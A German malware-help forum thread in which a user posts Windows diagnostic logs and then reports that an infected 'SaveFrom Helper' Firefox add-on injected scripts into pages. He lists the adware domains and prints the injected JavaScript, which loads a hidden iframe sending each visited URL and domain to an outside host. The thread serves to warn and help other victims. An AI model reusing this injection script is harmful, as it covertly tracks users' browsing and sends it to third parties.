FirewallRules: [TCP Query User{ED855DBA-BA50-4583-97F1-C642301F43D8}C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe] => (Allow) C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe
FirewallRules: [UDP Query User{535BE06A-670C-41CB-BB85-FA3DAD9D358C}C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe] => (Allow) C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (05/27/2015 08:15:21 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-2798130160-1945478871-1923780282-1001}/">.

Error: (05/27/2015 08:11:53 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm Explorer.EXE, Version 6.3.9600.17667 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 3244

Startzeit: 01d0984381d9292a

Endzeit: 0

Anwendungspfad: C:\WINDOWS\Explorer.EXE

Berichts-ID: e577004d-0436-11e5-be8e-a41731ec29e8

Vollständiger Name des fehlerhaften Pakets: 

Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA FE80:0000:0000:0000:D1B2:D6F0:4F33:2936

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:7887:BBF0:964A:28D6

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:D1B2:D6F0:4F33:2936

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:    4 RubensVaio.local. Addr 192.168.2.106

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478


System errors:
=============
Error: (05/26/2015 06:00:15 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: Der Name "WORKGROUP      :1d" konnte nicht auf der Schnittstelle mit IP-Adresse 192.168.2.106
registriert werden. Der Computer mit IP-Adresse 192.168.2.102 hat nicht
zugelassen, dass dieser Computer diesen Namen verwendet.

Error: (05/26/2015 05:56:06 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (05/26/2015 05:55:35 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (05/24/2015 07:38:03 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (05/24/2015 07:37:33 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (05/23/2015 03:23:45 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (05/23/2015 03:23:15 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (05/23/2015 02:05:29 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (05/23/2015 02:04:59 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (05/22/2015 06:13:01 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}


Microsoft Office:
=========================
Error: (05/27/2015 08:15:21 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: 300x80040d07iehistory://{S-1-5-21-2798130160-1945478871-1923780282-1001}/

Error: (05/27/2015 08:11:53 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Explorer.EXE6.3.9600.17667324401d0984381d9292a0C:\WINDOWS\Explorer.EXEe577004d-0436-11e5-be8e-a41731ec29e8

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA FE80:0000:0000:0000:D1B2:D6F0:4F33:2936

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:7887:BBF0:964A:28D6

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:D1B2:D6F0:4F33:2936

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:    4 RubensVaio.local. Addr 192.168.2.106

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz
Percentage of memory in use: 66%
Total physical RAM: 8139.28 MB
Available physical RAM: 2732.42 MB
Total Pagefile: 11979.28 MB
Available Pagefile: 4991.53 MB
Total Virtual: 131072 MB
Available Virtual: 131071.77 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:1825.12 GB) (Free:1750.36 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 1863 GB) (Disk ID: 95F2A7AC)

Partition: GPT Partition Type.

==================== End of log ============================
         
Die anderen Dateien befinden sich im Anhang (Zeichenbegrenzung). Die Gmer.txt konnte ich nirgendswo hinladen, sie ist 500KB groß: daher auf GitHub Gist: https://gist.github.com/RAnders00/5b2008f44e08912ac196
Angehängte Dateien
Dateityp: log defogger_disable.log (472 Bytes, 74x aufgerufen)
Dateityp: txt FRST.txt (62,2 KB, 135x aufgerufen)

Geändert von RAnders00 (27.05.2015 um 11:15 Uhr)

Alt 27.05.2015, 11:04   #2
schrauber
/// the machine
/// TB-Ausbilder
 

Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website - Standard

Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website



Hi,

Logs bitte immer in Codetags in den Thread posten
__________________

__________________

Alt 30.05.2015, 14:36   #3
RAnders00
 
Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website - Standard

Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website



Ich habe die Lösung gefunden.

Ich hatte eine scheinbar infinizerte Version des Firefox-Addons "SaveFrom Helper". Ich habe das Addon entfernt, Firefox neugestartet, das Addon neu von der offiziellen Mozilla-Addon-Seite heruntergeladen und prompt ist das Problem verschwunden.

Das Addon hatte JavaScript und Frames in die Seiten injektiert. Die Seiten, die in den Scripts uns Frames vorkamen, waren: (Für zukünftige user, die auf Google suchen)

Code:
ATTFilter
i.mgicinjs.info
foxi69.tlscdn.com
f.asdfzxcv1312.com
endall41-q.apollocdn.com
q.nadijs.info
f.asdfzxcv1312.com
q.mgicinjs.info
         
Desweiteren wurde folgendes Script in den Head-Teil der Seite injiziert: (Aufklappen für vernünftige Zeilenumbrüche)
Code:
ATTFilter
(function(){try{if(typeof window['asdfdsasdfdsa'] === 'undefined'){setTimeout(function(){var shouldThisPartOfCodeRun = document.URL.search('http') === 0 ;if(!shouldThisPartOfCodeRun){	return;}if(typeof DealPly !== 'undefined' && typeof DealPly.serverCallParam === 'string'  ){var reportFlag = true;var scArr = document.getElementsByTagName('script');for(var index in scArr){if(typeof scArr[index].src === 'string' && scArr[index].src.search('\\.js\\?dn=') !== -1){	reportFlag = false;}}if(!reportFlag ){	return;}var host = 'hxxp://q.nadijs.info/';var isSecure =  document.URL.search('https://') === 0 ;if(isSecure){	host = 'https://endall41-q.apollocdn.com/';}var urlPath = 'dealdo/event-report?type=quick&';var iframe = document.createElement('iframe');var suffix = ''; try{if(typeof JavaScriptJsTagUrl !== 'undefined'){suffix = JavaScriptJsTagUrl.substr(JavaScriptJsTagUrl.search('\?') + 1 );}}catch(e324324){}iframe.setAttribute('style','position:relative; left:-10000px; width:1px; height:1px; visibility:hidden');iframe.setAttribute('src',host + urlPath + 'url=' + encodeURIComponent(document.URL) + '&domain=' + document.domain   + '&topic=dpdiedarg&' + suffix );document.body.appendChild(iframe);}}, 10000);window['asdfdsasdfdsa'] = true;} }catch(e235534){}})();
         
Liebe Moderatoren, dieses Thema kann hiermit geschlossen werden. Ich have außerdem für eine gute Indizierung die Tags aufgeräumt und ergänzt

FOR ENGLISH VISITORS:
You have a infected version of the SaveFrom helper installed. Uninstall it and get a non-infected version from the official mozilla addon website.
__________________

Geändert von RAnders00 (30.05.2015 um 14:43 Uhr)

Alt 31.05.2015, 05:49   #4
schrauber
/// the machine
/// TB-Ausbilder
 

Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website - Standard

Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website



ok
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Antwort

Themen zu Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website
firefox, javascript, launch, mgicinjs, onedrive, plugins, savefrom



Ähnliche Themen: Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website


  1. Firefox 38.0.5 öffnet sich automatisch bei Windows-8.1-Start mit MSN-Deutschland-Website mit sonderbarer URL
    Plagegeister aller Art und deren Bekämpfung - 24.06.2015 (20)
  2. Riesenproblem beim Aufruf der Chip.de-Seite
    Plagegeister aller Art und deren Bekämpfung - 31.05.2015 (11)
  3. Firefox geht auf Malware-Seite und wird von Avira blockier
    Log-Analyse und Auswertung - 21.02.2015 (6)
  4. Verdächtige aktivität nach aufruf einer Spam seite
    Plagegeister aller Art und deren Bekämpfung - 04.09.2014 (1)
  5. Windows 8: Malware/Adware Probleme, Aufruf von unerwünschten Seiten im Internet
    Log-Analyse und Auswertung - 10.08.2014 (7)
  6. Laptop arbeitet dauernd | Firefox leitet auf Malware Seite um | Dienste nicht mehr reaktivierbar
    Plagegeister aller Art und deren Bekämpfung - 27.07.2014 (14)
  7. Bei Aufruf einer Seite oder Funktion öffnen sich ständig Fenster, die nicht gewünscht sind, auch während ich dies schreibe.
    Log-Analyse und Auswertung - 08.06.2014 (1)
  8. Windows 7, bei Firefox öffnet sich ab und an graues Fenster und bei geschlossenem browser kommt die website von Survey Monkey Powered Online
    Log-Analyse und Auswertung - 21.11.2013 (9)
  9. Windows 7 hängt sich nach beliebiger Aktion nach dem hochfahren auf! Abgesicherter Modus ebenfalls!
    Plagegeister aller Art und deren Bekämpfung - 12.09.2013 (21)
  10. Trojan.JS.Redirector bei Aufruf von Firefox
    Plagegeister aller Art und deren Bekämpfung - 10.01.2013 (14)
  11. Bad Request 400 Firefox/ Falsche Verlinkung IE (Gomeo usw.)
    Plagegeister aller Art und deren Bekämpfung - 17.02.2011 (61)
  12. Bad request 400 - Firefox und IE Probleme - Windows 7
    Plagegeister aller Art und deren Bekämpfung - 17.02.2011 (1)
  13. HTML-Virus bei Website-Aufruf ... System kompromittiert?
    Plagegeister aller Art und deren Bekämpfung - 30.06.2010 (7)
  14. Tidserv Request 2 > svchost.exe, firefox.exe
    Plagegeister aller Art und deren Bekämpfung - 28.06.2010 (16)
  15. Aufruf Website Krankenkasse - Laden von russischen Servern.
    Plagegeister aller Art und deren Bekämpfung - 08.02.2010 (8)
  16. IExplorer beendet sich sofort nach aufruf von anderer Seite als Startseite
    Log-Analyse und Auswertung - 28.11.2006 (7)

Zum Thema Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website - Ich habe folgendes festgestellt: Als ich in der Konsole des Firefox (38.0.1) war, fiel mir auf, dass nach Ende der Ladezeit einer Website ein HTTP GET Request an eine Seite - Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website...
Archiv
Du betrachtest: Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.